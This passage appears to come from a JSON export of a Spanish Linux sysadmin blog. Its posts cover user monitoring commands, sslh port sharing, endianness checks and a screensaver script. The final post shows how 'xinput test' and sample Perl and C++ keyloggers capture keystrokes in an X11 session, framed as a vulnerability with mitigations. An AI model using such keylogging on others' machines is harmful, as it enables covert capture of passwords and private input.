reported\n-b     The maximum socket buffer size\n-c     The maximum size of core files created\n-d     The maximum size of a process’s data segment\n-e     The maximum scheduling priority (\u0026#34;nice\u0026#34;)\n-f     The maximum size of files written by the shell and its children\n-i     The maximum number of pending signals\n-l     The maximum size that may be locked into memory\n-m     The maximum resident set size (many systems do not honor this limit)\n-n     The maximum number of open file descriptors (most systems do not allow this value to be set)\n-p     The pipe size in 512-byte blocks (this may not be set)\n-q     The maximum number of bytes in POSIX message queues\n-r     The maximum real-time scheduling priority\n-s     The maximum stack size\n-t     The maximum amount of cpu time in seconds\n-u     The maximum number of processes available to a single user\n-v     The maximum amount of virtual memory available to the shell and, on some systems, to its children\n-x     The maximum number of file locks\n-T     The maximum number of threads\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara consultar todos los valores asignados actualmente:\u003c/p\u003e","title":"Limitando el número de procesos por usuario"},{"content":"Podemos utilizar varios comandos para saber qué usuarios están conectados al sistema, desde cuando y qué están haciendo. También podemos saber cuando se han conectado anteriormente.\nTambién podríamos interactuar con los usuarios, enviarles mensajes, matarles procesos, echarlos del sistema, etc, pero ahora nos vamos a centrar en saber cuando entran, cuando salen y qué están haciendo.\nw Con w podemos saber que usuarios están conectados ahora mismo y que procesos están ejecutando.\n$ w 11:54:16 up 4:04, 3 users, load average: 0,34, 0,12, 0,12 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT karpoke tty1 08:58 9.00s 0.62s 0.50s -bash karpoke tty7 :0 07:51 3:04m 7:08 0.28s gnome-session --session=2d-gnome karpoke pts/0 :0.0 07:51 54.00s 1.18s 0.69s ssh 192.168.50.2 karpoke pts/1 :0.0 08:14 0.00s 1.67s 0.00s w karpoke pts/2 192.168.50.10:S. 08:27 0.00s 0.53s 0.00s /bin/bash karpoke pts/3 192.168.50.10:S. 08:42 3:19 0.28s 0.28s /bin/bash En la cabecera muestra la hora actual, el tiempo que lleva encendida la máquina, el número de usuarios en el sistema y la carga media del último minuto, los últimos 5 minutos y los últimos 15 minutos. Después, para cada conexión de usuario, muestra el nombre de usuario, el terminal al que está conectado, la máquina remota, el tiempo que hace que está conectado, el tiempo que ha estado sin hacer nada, el tiempo usado por los procesos en ejecución, incluyendo procesos en segundo plano, y el tiempo utilizado por el proceso en ejecución, que es el que aparece en la última columna.\nEl terminal al que está conectado el usuario puede ser:\nun terminal en modo texto, como tty1. Desde la sesión gráfica podemos cambiar a este tipo de terminal utilizando la combinación de teclas `Ctrl+Alt+F\u0026lt;1-6\u0026gt;` una terminal gráfico, como tty7. Es el terminal por defecto cuando iniciamos sesión en Gnome o KDE un emulador de terminal, como pts/0. Cuando nos conectamos usando `gnome-terminal`, por ejemplo. Cuando el usuario se conecta desde la propia máquina, en la columna correspondiente a la máquina desde la cual se conecta el usuario aparece el contenido de la variable DISPLAY, si es que está definida. Esta variable está controlada por el servidor de las X y consiste en un nombre de host, que no aparece cuando se refiere a la propia máquina, seguido de dos puntos \u0026ldquo;:\u0026rdquo; y un número de secuencia, que suele ser 0 pero puede variar si hay varias sesiones gráficas conectadas a la misma máquina. Si continua con un punto seguido de un número, se refiere al número de pantalla dentro de la misma sesión gráfica.\nEn el último caso, cuando aparece una IP seguida de dos puntos y una S, quiere decir que el usuario está utilizando screen (o, como en este caso, byobu). En este caso, la longitud de la IP corta el contenido, ya que después de la S viene una secuencia que indica cada una de las \u0026ldquo;ventanas\u0026rdquo; abiertas con screen, por ejemplo: 192.168.50.10:S.1.\nPodemos iniciar otra sesión gráfica ejecutando en un terminal, debemos ir a un terminal en modo texto libre, por ejemplo, tty1, pulsando Ctrl+Alt+F1, iniciamos sesión, y ejecutamos:\n$ startx -- :1 # importante: hay un espacio antes y después de los dos guiones Para acceder a esta nueva sesión gráfica, pulsamos Ctrl+Alt+F8.\nSólo puede haber una sesión gráfica por terminal, por lo que si quisiéramos una más, deberíamos ir tty2, pulsando Ctrl+Alt+F2, y ejecutar:\n$ startx -- :2 Para acceder a esta sesión gráfica, pulsamos Ctrl+Alt+F9.\nwho Con who también podemos saber quién está conectado.\n$ who -a Sistema de arranque 2011-07-27 07:50 `run-level\u0026#39; 2 2011-07-27 07:50 LOGIN tty4 2011-07-27 07:50 1250 id=4 LOGIN tty5 2011-07-27 07:50 1254 id=5 LOGIN tty2 2011-07-27 07:50 1288 id=2 LOGIN tty3 2011-07-27 07:50 1289 id=3 LOGIN tty6 2011-07-27 07:50 1291 id=6 karpoke - tty1 2011-07-27 11:58 00:19 14171 karpoke + tty7 2011-07-27 07:51 antig 3723 (:0) karpoke + pts/0 2011-07-27 07:51 00:01 5965 (:0.0) karpoke + pts/1 2011-07-27 08:14 . 5965 (:0.0) pts/2 2011-07-27 11:07 0 id=/2 term=0 salida=0 Nos muestra la fecha y hora del último arranque del sistema y el nivel de ejecución. Después, en la primera columna, muestra los procesos de login, marcados con la palabra LOGIN, los usuarios que han iniciado sesión y, si no aparece nada, se refiere a los procesos muertos, por ejemplo, si abrimos un terminal y lo cerramos. También muestra el PID del proceso en ejecución y la máquina remota o el DISPLAY correspondiente.\nEl comando tiene varias opciones para mostrar esta información por partes, por ejemplo, el número de usuarios conectados:\n$ who -q karpoke karpoke karpoke karpoke # usuarios=4 whoami Con whoami podemos saber, única y exclusivamente, cual es nuestro usuario:\n$ whoami karpoke Es equivalente a ejecutar:\n$ id -un id id muestra información de los identificadores de usuarios y grupos:\n$ id uid=1000(user) gid=1000(user) grupos=1000(user),4(adm),7(lp),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),103(fuse),104(lpadmin),112(netdev),115(admin),120(sambashare) Tiene varios argumentos que permiten mostrar sólo cierta información y de diferentes maneras.\nwhowatch whowatch es un monitor interactivo por consola de procesos y usuarios. Muestra información de los usuarios conectados al sistema en tiempo real. Además de la información habitual, como el nombre de usuario, el terminal, la máquina remota o el tipo de conexión, se puede visualizar el árbol de procesos del usuario, e incluso enviarle señales, como SIGINT o SIGKILL, a dichos procesos.\nSoporta el uso de complementos, hasta 3, que amplíen la información acerca del sistema, de un usuario o de un proceso.\n$ whowatch 3 users: (2 local, 0 telnet, 0 ssh, 1 other) load: 0.06, 0.08, 0.31 (gdm-session-w karpoke tty7 :0 - (init) karpoke pts/0 :0.0 - (init) karpoke pts/1 :0.0 - [F1]Help [F9]Menu [ENT]proc all[t]ree [i]dle/cmd [c]md [d]etails [s]ysinfo Pulsando Intro en el usuario conectado que queramos nos muestra información de los procesos que está ejecutando:\n3 users: (2 local, 0 telnet, 0 ssh, 1 other) load: 0.03, 0.07, 0.30 (init) karpoke pts/1 :0.0 6056 - gnome-terminal 6105 |- bash 3135 | `- ssh 192.168.50.10 6062 |- gnome-pty-helper 2982 `- bash 3845 R `- whowatch [ENT]users [c]md all[t]ree [d]etails [o]wner [s]ysinfo sig[l]ist ^[K]ILL Podemos ver detalles de un proceso concreto:\n”Œ””””””””””””””””””””””””””””””””””””””””””””””””””” ”‚START: Mon Aug 1 09:11:00 2011 ”‚ ”‚EXE: /usr/bin/ssh ”‚ ”‚ROOT: / ”‚ ”‚CWD: /home/karpoke ”‚ ”‚ ”‚ ”‚STATUS: ”‚ ”‚Uid: 1000 1000 1000 1000 ”‚ ”‚Gid: 1000 1000 1000 1000 ”‚ ”‚FDSize: 256 ”‚ ”‚Groups: 4 7 20 24 29 44 46 103 104 112 115 120 100”‚ ”‚VmPeak: 7460 kB ”‚ ”‚VmSize: 7460 kB ”‚ ”‚VmLck: 0 kB ”‚ ””””””””””””””””””””””””””””” \u0026lt; - -\u0026gt; [a]up, [z]down ”\u0026#39; Y enviarle una señal:\n”Œ PID 3135 - choose signal and press \u0026#39;y\u0026#39; to send ””” ”‚-\u0026gt;1 HUP Hangup detected on controlling terminal ”‚ ”‚ 2 INT Interrupt from keyboard ”‚ ”‚ 3 QUIT Quit from keyboard ”‚ ”‚ 4 ILL Illegal Instruction ”‚ ”‚ 6 ABRT Abort signal from abort(3) ”‚ ”‚ 8 FPE Floating point exception ”‚ ”‚ 9 KILL Kill signal ”‚ ”‚ 11 SEGV Invalid memory reference ”‚ ”‚ 13 PIPE Broken pipe: write to pipe with no read”‚ ”‚ 14 ALRM Timer signal from alarm(2) ”‚ ”‚ 15 TERM Termination signal ”‚ ”‚ ”‚ ”‚ ”‚ ””””””””””””””””””””””””””””” \u0026lt; - -\u0026gt; [a]up, [z]down ”\u0026#39; También podemos consultar información del sistema:\n”Œ””””””””””””””””””””””””””””””””””””””””””””””””””” ”‚BOOT TIME: Mon Aug 1 08:30:18 2011 ”‚ ”‚CPU: 3.6% user 2.1% sys 1.0% nice 93.2% idle ”‚ ”‚MEMORY: ”‚ ”‚MemTotal: 4081788 kB ”‚ ”‚MemFree: 436656 kB ”‚ ”‚Buffers: 530624 kB ”‚ ”‚Cached: 1825612 kB ”‚ ”‚SwapCached: 0 kB ”‚ ”‚Active: 1777952 kB ”‚ ”‚Inactive: 1396896 kB ”‚ ”‚Active(anon): 709296 kB ”‚ ”‚Inactive(anon): 115352 kB ”‚ ”‚Active(file): 1068656 kB | ””””””””””””””””””””””””””””” \u0026lt; - -\u0026gt; [a]up, [z]down ”\u0026#39; finger finger muestra información acerca de los usuarios del sistema, tal como el nombre de usuario, el nombre real, el terminal al que está conectado y si tiene permisos de escritura, la hora de inicio de sesión, tiempo que ha estado ocioso, información de contacto, si tiene correo y cuando fue la última vez que lo consultó, etc.\n$ finger Login Name Tty Idle Login Time Office Office Phone karpoke karpoke tty7 26 Aug 1 08:31 (:0) karpoke karpoke pts/0 Aug 1 08:32 (:0.0) $ finger karpoke Login: karpoke Name: karpoke Directory: /home/karpoke Shell: /bin/bash On since Mon Aug 1 08:31 (CEST) on tty7 from :0 27 minutes 18 seconds idle On since Mon Aug 1 08:32 (CEST) on pts/0 from :0.0 Mail last read Sat Jul 30 14:40 2011 (CEST) No Plan. Antiguamente, se podía acceder a la información de un usuario de forma remota. Hoy en día, el servicio de finger no suele utilizarse, por lo que se limita a mostrar información de nuestra propia máquina.\nHay una serie de ficheros que se mostrarán si se encuentran en el directorio del usuario: .plan, .project y .gpgkey. Además, si el fichero ~/.nofinger existe, finger no mostrará información del usuario a ninguna petición remota.\nlast last muestra los último usuarios conectados. Por defecto, busca la información en el fichero /var/log/wtmp. La información se limpia a principios de cada mes.\n$ last karpoke pts/1 192.168.50.10 Mon Aug 1 09:11 still logged in wtmp begins Mon Aug 1 09:11:04 2011 Cuando tengamos muchas entradas, una opción interesante sería mostrar el listado en orden inverso:\n$ last | tac wtmp begins Mon Aug 1 09:11:04 2011 karpoke pts/1 192.168.50.10 Mon Aug 1 09:11 still logged in lastlog lastlog muestra la última conexión de los usuario del sistema. Permite especificar un rango de fechas o un usuario concreto. El orden es el mismo en el que aparecen en /etc/passwd.\n$ lastlog -t 1000 Username Port From Latest root tty2 dom nov 1 13:40:34 +0100 2009 karpoke pts/1 192.168.50.10 lun ago 1 09:11:04 +0200 2011 El contenido lo lee del fichero binario /var/log/lastlog.\nacct acct muestra el tiempo de conexión en horas basándose en el fichero /var/log/wtmp. Permite múltiples opciones, como el tiempo total por día o por usuario. También muestra el total global.\n$ ac -d Today total 0.24 $ ac -p karpoke 0.25 total 0.25 El tiempo se expresa en horas en formato decimal, pero podemos convertirlo fácilmente a sexagesimal:\n$ ac -d | awk \u0026#39;{h=int($NF); m=($NF-h)*60; s=int((m-int(m))*60); m=int(m); print $0\u0026#34; = \u0026#34;h\u0026#34;h \u0026#34;m\u0026#34;m \u0026#34;s\u0026#34;s \u0026#34;}\u0026#39; Today total 0.31 = 0h 18m 36s ","permalink":"http://karpoke.ignaciocano.com/2011/08/01/controlando-la-actividad-de-los-usuarios-conectados/","summary":"\u003cp\u003ePodemos utilizar varios comandos para saber qué \u003ca href=\"/2010/10/22/la-guardiana-de-la-puerta/\"\u003eusuarios están\nconectados al sistema\u003c/a\u003e, desde cuando y qué están haciendo. También\npodemos saber cuando se han conectado anteriormente.\u003c/p\u003e\n\u003cp\u003eTambién podríamos interactuar con los usuarios, enviarles mensajes,\nmatarles procesos, echarlos del sistema, etc, pero ahora nos vamos a\ncentrar en saber cuando entran, cuando salen y qué están haciendo.\u003c/p\u003e\n\u003ch2 id=\"w\"\u003e\u003ccode\u003ew\u003c/code\u003e\u003c/h2\u003e\n\u003cp\u003eCon \u003ccode\u003ew\u003c/code\u003e podemos saber que usuarios están conectados ahora mismo y que\nprocesos están ejecutando.\u003c/p\u003e","title":"Controlando la actividad de los usuarios conectados"},{"content":"Podemos tener varios motivos para tener escuchando nuestro servicio de SSH en el puerto 443. Ya sea porque queremos evitarnos los continuos intentos de conexión que sufrimos por tener el servicio escuchando en el puerto 22 o porque desde donde estemos, ya sea en el trabajo o en un hotel, no estén permitidas las conexiones que no sean al puerto 80 o 443. Pero, ¿y si ya tenemos un servidor web escuchando en el puerto 443?\nMediante sslh se puede multiplexar la conexión al puerto 443, de tal forma que dependiendo del protocolo utilizado para conectarnos reenvíe la conexión al puerto 22 si es SSH o al 443 si es SSL. La detección del protocolo se basa en los primeros bytes enviados por el cliente. Las conexiones SSH empiezan con la identificación del cliente utilizando la cadena \u0026ldquo;SSH-2.0\u0026rdquo;, dependiendo de la versión. Los clientes OpenVPN cmoienzan con 0x00 0x0D 0x38. Hay dos tipos de clientes SSH, los que esperan que sea el servidor el primero que envíe su versión (shy client) y los que son ellos los que la envían primero (bold client).\nsslh espera un tiempo para recibir la versión de SSH. Si transcurrido ese tiempo no ha recibido nada, asume que es un \u0026ldquo;cliente tímido\u0026rdquo; y se realiza la conexión con el servidor SSH. Si el cliente envía un paquete antes, sslh lo lee y se lo envía al servidor SSH o SSL, según corresponda.\nUno de los inconvenientes de sslh es que tanto el servidor de SSH como el servidor web no ven la IP original, ya que la conexión se redirecciona desde sslh. Para poder limitar el acceso, sslh se puede compilar para que compruebe las listas de acceso definidas en /etc/hosts.allow y /etc/hosts.deny.\nInstalación desde los respositorios de Ubuntu Lucid Lynx Lo podemos instalar desde los respositorios. Es Ubuntu Lucid Lynx está la versión 1.6i-4:\n$ sudo aptitude install sslh Al principio, se encuentra desactivado, para obligarnos a leer la documentación. Después de echarle un ojo a la página del man, podemos configurarlo editando el fichero /etc/default/sslh:\nDAEMON_OPTS=\u0026#34;-u sslh -p 0.0.0.0:443 -s 127.0.0.1:22 -l 127.0.0.1:1443 -P /var/run/sslh.pid\u0026#34; RUN=yes Estas opciones indican que el servicio se ejecutará como el usuario sslh, escuchando en todas las interfaces en el puerto 443, y redireccionará las conexiones SSH al puerto 22 de la máquina local, y las conexiones SSL al puerto 1443 de la máquina local. El archivo que contiene el PID del servicio es /var/run/sslh.pid. Para que pueda ejecutarse, debemos añadir la última línea, RUN=yes.\nInstalación desde el código fuente Ahora mismo van por la versión 1.9, así que en lugar de instalarlo desde los repositorios, lo haremos desde el código fuente:\n$ wget http://www.rutschle.net/tech/sslh-1.9.tar.gz $ tar xzvf sslh-1.9.tar.gz $ cd sslh-1.9/ Si queremos compilar con la opción de que se comprueben las listas de acceso, deberemos realizar un par de acciones previas al make install:\n$ sudo aptitude install libwrap0{,-dev} tcpd $ sed -i \u0026#39;s/USELIBWRAP=./USELIBWRAP=1/\u0026#39; Makefile Ahora ya podemos pasar a la instalación:\n$ sudo make install $ sudo make install-debian Editamos el fichero /etc/default/sslh para configurar las interfaces. Para evitar que haya cualquier tipo de colisión entre openssh, apache2 y sslh, debemos asegurarnos de que no escuchan en el mismo puerto o que lo hacen en interfaces diferentes. En la interfaz en la que escucha sslh podríamos poner nuestra IP pública, si fuese fija. Sino, lo más cómodo será cambiar el puerto en el que escucha apache2 para las conexiones seguras:\nLISTEN=0.0.0.0:443 SSH=localhost:22 SSL=localhost:1443 Configurar apache2 Antes de reiniciar el servicio sslh, deberemos modificar la configuración de Apache para que no haya conflicto entre las interfaces. En el fichero /etc/apache2/ports.conf cambiamos el número de puerto en el que escucha para las conexiones seguras:\nListen 1443 # formerly 443 No olvidemos cambiarlo también en la configuración del VirtualHost, por ejemplo en /etc/apache2/sites-available/default-ssl.\nAhora, reiniciamos ambos servicios:\n$ sudo service sslh start $ sudo service apache2 restart Ya podemos probarlo.\n$ w3m https://mydomain.com $ ssh -p443 mydomain.com En los logs, /var/log/syslog, podremos ver algo como:\nJul 30 19:38:00 terminus sslh[25196]: connection from 1.2.3.4:42711 forwarded to SSL Jul 30 19:38:01 terminus sslh[25196]: connection from 1.2.3.4:42712 forwarded to SSL Jul 30 19:39:01 terminus sslh[25196]: connection from 1.2.3.4:43923 forwarded to SSH logcheck nos alerta de cada conexión redirigida Si tenemos instalado logcheck y no queremos que nos lleguen estos avisos cada vez, podemos crear el archivo /etc/logcheck/ignore.d.server/sslh e incluir la siguiente línea:\n^\\w{3} [ :[:digit:]]{11} [._[:alnum:]-]+ sslh\\[[[:digit:]]+\\]: connection from [:.[:xdigit:]]+ forwarded to SS(L|H)$ ¿Y el cortafuegos? Si, por ejemplo, utilizamos ufw, podemos modificar la regla para permitir las conexiones al puerto 22 únicamente desde la propia LAN:\n$ sudo ufw allow proto tcp from 192.168.50.0/24 to any port 22 También podemos borrar la regla antigua:\n$ sudo ufw delete allow tcp/22 ","permalink":"http://karpoke.ignaciocano.com/2011/07/30/sslh-compartiendo-el-puerto-443/","summary":"\u003cp\u003ePodemos tener varios motivos para tener escuchando nuestro servicio de SSH en\nel puerto 443. Ya sea porque queremos evitarnos los continuos intentos de\nconexión que sufrimos por tener el servicio escuchando en el puerto 22 o porque\ndesde donde estemos, ya sea en el trabajo o en un hotel, no estén permitidas\nlas conexiones que no sean al puerto 80 o 443. Pero, ¿y si \u003ca href=\"http://dischord.org/blog/2010/08/25/multiplexing-ssh-and-ssl/\"\u003eya tenemos un\nservidor web\u003c/a\u003e escuchando en el puerto 443?\u003c/p\u003e","title":"sslh, compartiendo el puerto 443"},{"content":"\u0026ldquo;Endianicidad\u0026rdquo; designa el formato en el que se almacenan los datos de más de un byte en un ordenador. El sistema big-endian adoptado por Motorola entre otros, consiste en representar los bytes en el orden \u0026ldquo;natural\u0026rdquo;, así el valor hexadecimal 0x4A3B2C1D se codificaría en memoria en la secuencia {4A, 3B, 2C, 1D}. En el sistema little-endian adoptado por Intel, entre otros, el mismo valor se codificaría como {1D, 2C, 3B, 4A}, de manera que de este modo se hace más intuitivo el acceso a datos, porque se efectúa fácilmente de manera incremental de menos relevante a más relevante (siempre se opera con incrementos de contador en la memoria).\nAlgunas arquitecturas de microprocesador pueden trabajar con ambos formatos (ARM, PowerPC, DEC Alpha, PA-RISC, Arquitectura MIPS), y a veces son referidas como sistemas middle-endian.\nComprobación en C Una posible forma de comprobar qué sistema utilizamos mediante un programa en C es con el siguiente código:\n#include int main(int argc, char **argv) { int i = 1; char *p = (char *) \u0026amp;i; if ( p[0] == 1 ) printf(\u0026#34;Little Endian\\n\u0026#34;); else printf(\u0026#34;Big Endian\\n\u0026#34;); return 0; } Se obtiene la dirección de memoria de un entero, con un espacio de almacenamiento de al menos 16 bits, cuyo valor es 1. Leemos el primer byte y si es 1 es que little-endian. Para leer el primer byte del entero, hacemos una conversión de tipo puntero a carácter.\nComprobación en Bash El siguiente comando utiliza el caracter ASCII \u0026ldquo;I\u0026rdquo;, cuyo valor en octal en sistemas little-endian es 000111, mientras que en sistemas big-endian es 0444000. Basta comprobar el último carácter para conocer el tipo de sistema. Si es 1 es que utilizamos little-endian:\n$ echo -n I | od -to2 | head -n1 | cut -f2 -d\u0026#34; \u0026#34; | cut -c6 1 También podemos utilizar awk:\n$ awk \u0026#39;BEGIN {c=\u0026#34;I\u0026#34;; printf \u0026#34;%c\u0026#34;,c}\u0026#39; | od | head -n1 | cut -f2 -d\u0026#34; \u0026#34; | cut -c6 1 Comprobación en Python Utilizando el método pack:\n$ python -c \u0026#34;from struct import pack;print(int(pack(\u0026#39;@h\u0026#39;,1)==pack(\u0026#39; Consultando la propiedad byteorder: $ python -c \u0026#34;import sys;print sys.byteorder\u0026#34; little $ python -c \u0026#34;import sys;print(0 if sys.byteorder==\u0026#39;big\u0026#39; else 1)\u0026#34; 1 Comprobación en Perl El resultado haciendo la comprobación en Perl es 1234 para little-endian.\n$ perl -MConfig -e \u0026#39;print \u0026#34;$Config{byteorder}\\n\u0026#34;;\u0026#39; 1234 También se puede utilizar la función pack:\n$ perl -MConfig -e \u0026#39;print pack(\u0026#34;L\u0026#34;, 1) ne pack(\u0026#34;N\u0026#34;, 1);\u0026#39; 1 \u0026#34;utiliza el caracter ASCII \u0026#34;I\u0026#34;\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/07/30/endianness/","summary":"\u003cp\u003e\u0026ldquo;\u003ca href=\"http://secure.wikimedia.org/wikipedia/es/wiki/Endianness\"\u003eEndianicidad\u003c/a\u003e\u0026rdquo; designa el formato en el que se almacenan los datos\nde más de un byte en un ordenador. El sistema \u003cem\u003ebig-endian\u003c/em\u003e adoptado por\nMotorola entre otros, consiste en representar los bytes en el orden\n\u0026ldquo;natural\u0026rdquo;, así el valor hexadecimal 0x4A3B2C1D se codificaría en memoria\nen la secuencia {4A, 3B, 2C, 1D}. En el sistema \u003cem\u003elittle-endian\u003c/em\u003e adoptado\npor Intel, entre otros, el mismo valor se codificaría como {1D, 2C, 3B,\n4A}, de manera que de este modo se hace más intuitivo el acceso a datos,\nporque se efectúa fácilmente de manera incremental de menos relevante a\nmás relevante (siempre se opera con incrementos de contador en la\nmemoria).\u003c/p\u003e","title":"Endianness"},{"content":"Si queremos que cada vez que aparezca el salvapantallas, lo haga mostrando algunas líneas del código fuente del kernel por pantalla, sólo necesitamos configurar el salvapantallas phosphor.\nLo primero es instalar el código fuente del kernel:\n$ sudo apt-get source linux-source-$(uname -r) El comando uname muestra información acerca del sistema operativo instalado, la versión del kernel, la familia del procesador, el nombre de la máquina o la plataforma. En mi caso, uso un kernel PAE, porque tengo una Ubuntu de 32 bits y 4 GB de RAM, por lo que el comando anterior no me ha ido del todo bien:\n$ uname -r 2.6.38-10-generic-pae Así que, en su lugar, he utilizado:\n$ sudo apt-get source linux-2.6.38 Una vez descargado el código fuente del kernel, configuraremos phosphor para que muestre el contenido de algún fichero. Si no tenemos instalado phosphor, habrá que instalar el paquete xscreensaver-data-extra.\nEl fichero de configuración de phosphor está en /usr/share/applications/screensavers/phosphor.desktop:\n[Desktop Entry] Name=Phosphor Exec=/usr/lib/xscreensaver/phosphor -root TryExec=/usr/lib/xscreensaver/phosphor Comment=Draws a simulation of an old terminal, with large pixels and long-sustain phosphor. On X11 systems, This program is also a fully-functional VT100 emulator! Written by Jamie Zawinski. StartupNotify=false Terminal=false Type=Application Categories=Screensaver; OnlyShowIn=GNOME; Para probarlo podemos ejecutar:\n$ /usr/lib/xscreensaver/phosphor -program fortune $ /usr/lib/xscreensaver/phosphor -scale 2 -delay 40000 -ticks 10 -geom \u0026#39;1680x1050\u0026#39; -program \u0026#39;od -txC -w6 /dev/random\u0026#39; Podemos pasarle diferentes opciones, tales como el tipo, el tamaño o la escala de la fuente a utilizar, la velocidad a la que escribe, el programa del cual debe recoger el texto, etc.\nCrearemos un pequeño script, random-lines-of-code.sh, que permita seleccionar un trozo aleatorio de un fichero aleatorio del código fuente del kernel;\nfunction randint() { cat /proc/interrupts | md5sum | sed -r \u0026#39;s/[a-f]//g; s/^0+//; s/.{3}$//\u0026#39; } # random file f=$(ls /usr/src/linux-2.6.38/_/_.{c,h} | shuf -n1) # number of lines declare -i nol=$(wc -l $f | awk \u0026#39;{print $1}\u0026#39;) # choose a random first line declare -i first=$( echo $(randint) % $nol | bc ) # choose a random bunch of lines declare -i offset=$( echo $(randint) % \\($nol-$first\\) | bc ) # first line doesn\u0026#39;t start at 0 first=$(( first+1 )) # last line declare -i last=$(( first+offset )) # show the lines of the file cat $f | sed -n ${first},${last}p Guardamos el script, le damos permisos de ejecución y modificamos el fichero de configuración de phosphor para que lo ejecute. Cambiamos la línea del Exec:\nExec=/usr/lib/xscreensaver/phosphor -root -scale 2 -program \u0026#39;/home/user/random-lines-of-code.sh\u0026#39; En el menú Sistema \u0026gt; Preferencias \u0026gt; Salvapantallas seleccionamos Phosphor, y listos.\n","permalink":"http://karpoke.ignaciocano.com/2011/07/28/salvapantallas-con-el-codigo-fuente-del-kernel/","summary":"\u003cp\u003eSi queremos que cada vez que aparezca el salvapantallas, lo haga\nmostrando algunas líneas del código fuente del \u003cem\u003ekernel\u003c/em\u003e por pantalla,\nsólo necesitamos configurar el salvapantallas \u003ccode\u003ephosphor\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Phosphor\" loading=\"lazy\" src=\"/images/phosphor-300x178.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLo primero es instalar el código fuente del \u003ccode\u003ekernel\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo apt-get source linux-source-$(uname -r)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEl comando \u003ccode\u003euname\u003c/code\u003e muestra información acerca del sistema operativo\ninstalado, la versión del kernel, la familia del procesador, el nombre\nde la máquina o la plataforma. En mi caso, uso un kernel PAE, porque\ntengo una Ubuntu de 32 bits y 4 GB de RAM, por lo que el comando\nanterior no me ha ido del todo bien:\u003c/p\u003e","title":"Salvapantallas con el código fuente del kernel"},{"content":"El comando xinput permite configurar y probar dispositivos de entrada para las XWindow. Podemos obtener un listado de los dispositivos de entrada:\n$ xinput list ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ SynPS/2 Synaptics TouchPad id=15 [slave pointer (2)] ⎣ Virtual core keyboard id=3 [master keyboard (2)] ↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)] ↳ Power Button id=6 [slave keyboard (3)] ↳ Video Bus id=7 [slave keyboard (3)] ↳ Power Button id=8 [slave keyboard (3)] ↳ Sleep Button id=9 [slave keyboard (3)] ↳ Laptop_Integrated_Webcam_2M id=10 [slave keyboard (3)] ↳ AT Translated Set 2 keyboard id=11 [slave keyboard (3)] ↳ Dell WMI hotkeys id=13 [slave keyboard (3)] También podemos obtener más información de algún dispositivo en concreto, por ejemplo, del teclado, cuyo identificador, en mi caso, es el 11:\n$ xinput list --long 11 AT Translated Set 2 keyboard id=11 [slave keyboard (3)] Reporting 1 classes: Class originated from: 11 Keycodes supported: 248 También podemos probar el teclado:\n$ xinput test 11 key release 36 key press 45 kkey release 45 key press 38 akey release 38 key press 27 rkey release 27 key press 33 pkey release 33 key press 32 okey release 32 key press 45 kkey release 45 key press 26 ekey release 26 Y el touchpad:\n$ xinput test 12 motion a[0]=2565 a[1]=3570 motion a[0]=2568 a[1]=3568 motion a[0]=2571 a[1]=3567 motion a[0]=2573 a[1]=3567 motion a[0]=2575 a[1]=3568 Todas las teclas que pulsemos, estemos o no en el terminal, aparecen en el terminal.\nEsto se debe a que:\nXWindows no implementa ningún mecanismo de [aislamiento entre aplicaciones][] que pertenecen a la misma sesión X y, por tanto, una aplicación con acceso a la sesión puede monitorizar las teclas pulsadas, o los movimientos de ratón. En principio, sólo será un problema si algún programa que utilicemos está comprometido o es malicioso. Para aprovechar `xinput` como _keylogger_ es necesario tener acceso a la sesión X. Utilizando AppArmor se puede reducir el riesgo, haciendo más difícil instalar un _keylogger_ de forma permanente. Sin embargo, no puede evitar que una aplicación registre las pulsaciones de teclado, y si ésta tiene acceso a internet, podría enviarlas a un servidor remoto. SELinux podría solucionar el problema. Sin embargo, las extensiones XSELinux no se cargan por defecto, no todas tienen una madurez para incluirlas en un entorno de producción, ni cuales pueden interferir negativamente en otras aplicaciones. Esta potencial vulnerabilidad podría ser aprovechada, por ejemplo, por:\neste script en Perl ^[1]^, que hace más sencillo reconocer qué teclas se están pulsando: $ perl keylog2.pl Keyboard ID: 11 Watching `xinput test 11` k(shift key: 0) [45] press: k (shift key: 0) [45] release: k a(shift key: 0) [38] press: a (shift key: 0) [38] release: a r(shift key: 0) [27] press: r (shift key: 0) [27] release: r p(shift key: 0) [33] press: p (shift key: 0) [33] release: p o(shift key: 0) [32] press: o (shift key: 0) [32] release: o k(shift key: 0) [45] press: k (shift key: 0) [45] release: k e(shift key: 0) [26] press: e (shift key: 0) [26] release: e [105] press: {Ctrl} ^C este programa en C++, $ g++ -lX11 keylogger.cpp -o keylogger $ ./keylogger Keylogger started Info about X11 connection: The display is:::0.0 Width::1680 Height::1050 Connection number is 3 You’ve got a coloured monitor with depth of 24 Logging started. 1311301288.99731492996215820312: 36 k1311301290.27069497108459472656: 45 1311301290.30860710144042968750: 45 a1311301290.34145402908325195312: 38 1311301290.37259697914123535156: 38 1311301290.40374803543090820312: 27 1311301290.40377688407897949219: 38 r1311301290.43391704559326171875: 27 1311301290.43394398689270019531: 38 1311301290.46408295631408691406: 27 1311301290.46410894393920898438: 33 p1311301290.49424099922180175781: 27 1311301290.49426794052124023438: 32 33 o1311301290.52452206611633300781: 32 33 k1311301290.55576109886169433594: 32 33 1311301290.55580902099609375000: 45 1311301290.58594703674316406250: 32 1311301290.58597397804260253906: 45 1311301290.61610102653503417969: 45 e1311301290.67649888992309570312: 26 1311301290.71751308441162109375: 26 1311301291.60019397735595703125: 105 ^C o este proyecto, iXKeyLog, 1 El script en Perl utiliza el módulo IO::Pty::Easy, y para poder probarlo en Ubuntu, no basta con la librería libio-pty-perl que hay en los respositorios, necesitaremos instalar el módulo de CPAN.\n","permalink":"http://karpoke.ignaciocano.com/2011/07/22/un-keylogger-en-ubuntu/","summary":"\u003cp\u003eEl comando \u003ccode\u003exinput\u003c/code\u003e permite configurar y probar dispositivos de entrada\npara las XWindow. Podemos obtener un listado de los dispositivos 